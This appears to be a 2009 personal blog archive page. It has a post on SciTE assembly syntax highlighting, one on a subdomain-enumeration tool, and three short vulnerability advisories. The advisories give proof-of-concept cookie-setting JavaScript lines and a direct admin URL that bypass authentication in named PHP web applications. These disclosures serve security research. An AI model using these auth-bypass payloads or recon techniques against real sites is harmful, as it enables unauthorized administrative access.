December 30th, 2009
in
Linux, Programming |
1 Comment
I have been using SciTE as my main programming text editor and more recently to code in assembly but unfortunately it does not seem to have support for AT&T style syntax and GAS (GNU Assembler) directives only Intel. So I have modified the asm.properties file and updated it to include the following:
- All GAS directives e.g. .long .ascii
- 32bit and 64bit registers for AT&T syntax e.g. %rax %ecx
- GAS Instructions e.g. movl, pushl
- Opens .s file extensions when filtering by assembly
Most likely I am missing a few things so let me know! You can download the asm.properties file from here:
AT&T / GAS syntax highlighting for SciTE
June 22nd, 2009
in
Networking, Security |
No Comments →
I have decided to port a script I done in C to PHP which I have made available online. I called it domRecon, it basically “hunts” for sub-domains for a domain that you provide.
It works by trying to get lucky by preforming a DNS zone transfer (AXFR) but on most domains this will fail. It will then use a list of about 2000 common sub-domain names and try see if it has a A record lookup on each sub-domain . Once that has finished it will scan 254 IP address (/24) of the networks looking for any more sub-domains.
A normal a complete scan would take about 20secs when checking 2000 sub-domains and scanning about 5 networks. However, large networks will take a lot longer. Status messages are displayed which will update you on the progress of the scan.
You can use the script by going to the following URL:
domrecon.jayscott.co.uk
March 6th, 2009
in
Security |
No Comments →
Star Article is a “Ready to use article, news, joke, tutorial site script with more features than you can think of”. Leads to full administration rights on the CMS admin panel via insecure cookie handling.
Name – admin_user
Content – admin
Path – /
Proof of Concept:
javascript:document.cookie=”admin_user=admin; path=/”
Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.
The full advisory can be found Here.
March 5th, 2009
in
Security |
No Comments →
PHP Site Lock A highly secure website (Ed: haha) login script which has features like User Authentication & Management, Website Password Protection , protection of pdf , images , etc. The Vulnerability leads to full administration rights of the admin panel.
Proof of Concept:
javascript:document.cookie=”user_type=admin; path=/”
javascript:document.cookie=”login_name=admin; path=/”
javascript:document.cookie=”login_id=0; path=/”
Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.
The full advisory can be found Here.
March 3rd, 2009
in
Security |
No Comments →
Next up is Million Dollar Text Links which is a link exchange application. No authentication checks on the admin home page allows anyone to just browse to the admin contol panel and bypass the login procedure. This will allow full access to the admin panel.
Proof of Concept:
http://sitename[applicationpath]/admin.home.php
Vendor was contacted twice over a 30 day period and didn’t not respond to any of the emails.
The full advisory can be found Here.
